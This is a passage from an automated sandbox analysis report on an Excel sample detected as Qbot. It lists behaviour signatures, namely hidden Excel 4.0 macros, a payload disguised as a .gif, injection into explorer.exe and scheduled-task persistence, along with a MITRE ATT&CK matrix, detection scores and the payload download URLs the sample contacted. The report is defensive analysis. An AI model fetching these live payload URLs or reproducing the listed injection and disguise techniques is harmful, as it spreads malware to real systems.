                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4036Thread sleep count: 186 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5496Thread sleep count: 114 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 7036Thread sleep time: -80000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gifJump to dropped file
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,9_2_1000D061
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000AEF6 FindFirstFileW,FindNextFileW,9_2_1000AEF6
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00AFAEF6 FindFirstFileW,FindNextFileW,17_2_00AFAEF6
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10005F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,9_2_10005F63
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000DFEF LoadLibraryA,GetProcAddress,9_2_1000DFEF
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1006BF06 mov eax, dword ptr fs:[00000030h]9_2_1006BF06
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1006BAE5 push dword ptr fs:[00000030h]9_2_1006BAE5
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1006BDDA mov eax, dword ptr fs:[00000030h]9_2_1006BDDA
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00AF5A54 RtlAddVectoredExceptionHandler,17_2_00AF5A54

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Maps a DLL or memory area into another processShow sources
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                  Injects code into the Windows Explorer (explorer.exe)Show sources
                  Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6888 base: AE0000 value: B8Jump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6888 base: 9D42D8 value: 00Jump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6888 base: 9D51E8 value: 00Jump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6888 base: B20000 value: 9CJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6888 base: DDF380 value: E9Jump to behavior
                  Yara detected hidden Macro 4.0 in ExcelShow sources
                  Source: Yara matchFile source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, type: SAMPLE
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00AF31B5 CreateNamedPipeA,17_2_00AF31B5
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_100097ED GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,9_2_100097ED
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,9_2_1000D061

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected QbotShow sources
                  Source: Yara matchFile source: 9.3.regsvr32.exe.33330bf.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.regsvr32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.explorer.exe.af0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.explorer.exe.af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.regsvr32.exe.33330bf.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected QbotShow sources
                  Source: Yara matchFile source: 9.3.regsvr32.exe.33330bf.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.regsvr32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.explorer.exe.af0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.explorer.exe.af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.3.regsvr32.exe.33330bf.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection213Masquerading11Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScripting1DLL Side-Loading1Scheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsNative API1Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Process Injection213NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 493727 Sample: SecuriteInfo.com.Exploit.Si... Startdate: 29/09/2021 Architecture: WINDOWS Score: 100 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Document exploit detected (drops PE files) 2->43 45 9 other signatures 2->45 9 EXCEL.EXE 27 39 2->9         started        process3 dnsIp4 33 mercanets.com 162.222.225.250, 443, 49752 PUBLIC-DOMAIN-REGISTRYUS United States 9->33 35 geit.in 162.251.80.22, 443, 49738 PUBLIC-DOMAIN-REGISTRYUS United States 9->35 37 gillcart.com 199.79.63.251, 443, 49724 PUBLIC-DOMAIN-REGISTRYUS United States 9->37 31 C:\Users\user\AppData\Local\...\key[1].gif, PE32 9->31 dropped 49 Document exploit detected (UrlDownloadToFile) 9->49 14 regsvr32.exe 9->14         started        17 regsvr32.exe 9->17         started        19 regsvr32.exe 9->19         started        file5 signatures6 process7 signatures8 51 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 14->51 53 Injects code into the Windows Explorer (explorer.exe) 14->53 55 Maps a DLL or memory area into another process 14->55 21 explorer.exe 8 1 14->21         started        process9 file10 29 C:\Datop\test1.test, PE32 21->29 dropped 47 Uses schtasks.exe or at.exe to add and modify task schedules 21->47 25 schtasks.exe 1 21->25         started        signatures11 process12 process13 27 conhost.exe 25->27         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls15%VirustotalBrowse
                  SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls22%ReversingLabsDocument-Excel.Downloader.EncDoc

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif100%Joe Sandbox ML
                  C:\Datop\test1.test100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  mercanets.com0%VirustotalBrowse
                  geit.in0%VirustotalBrowse
                  gillcart.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://roaming.edog.0%URL Reputationsafe
                  https://cdn.entity.0%URL Reputationsafe
                  https://powerlift.acompli.net0%URL Reputationsafe
                  https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                  https://cortana.ai0%URL Reputationsafe
                  https://api.aadrm.com/0%URL Reputationsafe
                  https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                  https://geit.in/MeOlE9Xxd/key.xml3%VirustotalBrowse
                  https://geit.in/MeOlE9Xxd/key.xml0%Avira URL Cloudsafe
                  https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                  https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                  https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                  https://store.office.cn/addinstemplate0%URL Reputationsafe
                  https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                  https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                  https://www.odwebp.svc.ms0%URL Reputationsafe
                  https://mercanets.com/9DPZqAfZdq5z/key.xml0%Avira URL Cloudsafe
                  https://dataservice.o365filtering.com/0%URL Reputationsafe
                  https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                  https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                  https://ncus.contentsync.0%URL Reputationsafe
                  https://apis.live.net/v5.0/0%URL Reputationsafe
                  https://wus2.contentsync.0%URL Reputationsafe
                  https://gillcart.com/Cdpmoyhr/key.xml0%Avira URL Cloudsafe
                  https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                  https://ncus.pagecontentsync.0%URL Reputationsafe
                  https://skyapi.live.net/Activity/0%URL Reputationsafe
                  https://dataservice.o365filtering.com0%URL Reputationsafe
                  https://api.cortana.ai0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mercanets.com
                  		162.222.225.250
                  		truefalseunknown
                  geit.in
                  		162.251.80.22
                  		truefalseunknown
                  gillcart.com
                  		199.79.63.251
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://geit.in/MeOlE9Xxd/key.xmlfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mercanets.com/9DPZqAfZdq5z/key.xmlfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://gillcart.com/Cdpmoyhr/key.xmlfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.diagnosticssdf.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                    		high
                    https://login.microsoftonline.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                      		high
                      https://shell.suite.office.com:144391397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                        		high
                        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                          		high
                          https://autodiscover-s.outlook.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                            		high
                            https://roaming.edog.91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                              		high
                              https://cdn.entity.91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.addins.omex.office.net/appinfo/query91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                		high
                                https://clients.config.office.net/user/v1.0/tenantassociationkey91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                  		high
                                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                    		high
                                    https://powerlift.acompli.net91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://rpsticket.partnerservices.getmicrosoftkey.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://lookup.onenote.com/lookup/geolocation/v191397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                      		high
                                      https://cortana.ai91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                        		high
                                        https://cloudfiles.onenote.com/upload.aspx91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                          		high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                            		high
                                            https://entitlement.diagnosticssdf.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                              		high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                		high
                                                https://api.aadrm.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                  		high
                                                  https://api.microsoftstream.com/api/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                    		high
                                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                      		high
                                                      https://cr.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                        		high
                                                        https://portal.office.com/account/?ref=ClientMeControl91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                          		high
                                                          https://graph.ppe.windows.net91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                            		high
                                                            https://res.getmicrosoftkey.com/api/redemptionevents91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://powerlift-frontdesk.acompli.net91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://tasks.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                              		high
                                                              https://officeci.azurewebsites.net/api/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                		high
                                                                https://store.office.cn/addinstemplate91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                  		high
                                                                  https://globaldisco.crm.dynamics.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                    		high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                      		high
                                                                      https://store.officeppe.com/addinstemplate91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://dev0-api.acompli.net/autodetect91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.odwebp.svc.ms91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groups91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                        		high
                                                                        https://web.microsoftstream.com/video/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                          		high
                                                                          https://graph.windows.net91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                            		high
                                                                            https://dataservice.o365filtering.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://officesetup.getmicrosoftkey.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://analysis.windows.net/powerbi/api91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                              		high
                                                                              https://prod-global-autodetect.acompli.net/autodetect91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://outlook.office365.com/autodiscover/autodiscover.json91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                		high
                                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                  		high
                                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                    		high
                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                      		high
                                                                                      https://ncus.contentsync.91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                        		high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                          		high
                                                                                          http://weather.service.msn.com/data.aspx91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                            		high
                                                                                            https://apis.live.net/v5.0/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                              		high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                		high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                  		high
                                                                                                  https://management.azure.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                    		high
                                                                                                    https://outlook.office365.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                      		high
                                                                                                      https://wus2.contentsync.91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://incidents.diagnostics.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                        		high
                                                                                                        https://clients.config.office.net/user/v1.0/ios91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                          		high
                                                                                                          https://insertmedia.bing.office.net/odc/insertmedia91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                            		high
                                                                                                            https://o365auditrealtimeingestion.manage.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office365.com/api/v1.0/me/Activities91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                		high
                                                                                                                https://api.office.net91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                  		high
                                                                                                                  https://incidents.diagnosticssdf.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                    		high
                                                                                                                    https://asgsmsproxyapi.azurewebsites.net/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://clients.config.office.net/user/v1.0/android/policies91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                        		high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                          		high
                                                                                                                          https://substrate.office.com/search/api/v2/init91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                              		high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocation91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                		high
                                                                                                                                https://outlook.office365.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://webshell.suite.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://management.azure.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorize91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://graph.windows.net/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://api.powerbi.com/beta/myorg/imports91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://devnull.onenote.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://ncus.pagecontentsync.91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://messaging.office.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://augloop.office.com/v291397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://skyapi.live.net/Activity/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/mac91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://dataservice.o365filtering.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
